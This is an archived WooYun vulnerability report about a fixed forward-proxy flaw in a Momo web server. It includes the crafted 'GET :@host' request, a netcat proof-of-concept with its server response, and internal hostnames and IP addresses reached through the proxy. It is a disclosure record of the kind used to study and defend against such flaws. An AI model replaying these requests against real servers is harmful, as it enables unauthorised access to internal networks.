破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

陌陌web服务器Path处理不当可以正向代理(idc机器/打不到办公网)

编号191121
Urlhttp://www.wooyun.org/bug.php?action=view&id=191121
漏洞状态厂商已经修复
漏洞标题陌陌web服务器Path处理不当可以正向代理(idc机器/打不到办公网)
漏洞类型设计缺陷/逻辑错误
厂商北京陌陌科技有限公司
白帽子lijiejie
提交日期2016-03-31 16:42:00
公开日期2016-04-08 20:01:00
修复时间2016-04-08 20:01:00
确认时间2016-04-01 00:00:00
Confirm Spend1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank6
厂商评级
厂商评rank10
漏洞简介
陌陌一台web服务器Path处理不当,可以正向代理,是idc的机器,可以在idc内穿,但打不到办公网。 (┬_┬)
漏洞细节

存在问题的web服务器是 chatst.immomo.com:80

GET :@www.lijiejie.com/xss.js HTTP/1.1
Host: chatst.immomo.com


momo.proxy.png


如图,已经可以代理访问www.lijiejie.com

POC

[email protected]:~/test# echo -e "GET :@www.lijiejie.com/xss.js HTTP/1.1\r\nHost: chatst.immomo.com\r\n\r\n" | nc chatst.immomo.com 80
HTTP/1.1 200 OK
Content-Length: 51
Expires: Tue, 27 Sep 2016 08:22:10 GMT
Server: MOMO
Last-Modified: Tue, 26 Jan 2016 07:40:04 GMT
Cache-Control: max-age=15552000
Date: Thu, 31 Mar 2016 08:22:09 GMT
Content-Type: application/octet-stream
alert('XSS on ' + document.domain + '\n' + Date())


测试了几个IP地址,办公网打不通:

office.wemomo.com             	172.16.7.3
hermes.wemomo.com 10.80.103.160


但还是找了个不通的:

maven.wemomo.com              	211.152.99.47


大家无法直接访问http://maven.wemomo.com的web服务,但是代理OK的。

momo.maven.png


修复方案

web server正确处理path

状态信息 2016-03-31: 细节已通知厂商并且等待厂商处理中
2016-04-01: 厂商已经确认,细节仅向厂商公开
2016-04-08: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复感谢lijiejie一直以来对陌陌的关注并多次提交高质量的漏洞,你的支持对我们也是一种鞭策,也希望大家继续帮助我们一起提高陌陌的安全水准。
回应信息危害等级:中漏洞Rank:10 确认时间:2016-04-01 19:20
Showing 1-4 of 4 items.
评论内容评论人点赞数评论时间

姐姐猴赛雷

Lar2y02016-04-06 08:58:00

为啥打不到也要写在标题上,猴赛雷~

从容02016-04-02 11:14:00

姐姐猴赛雷

sqlfeng02016-03-31 18:32:00

前排

东方先生02016-03-31 17:12:00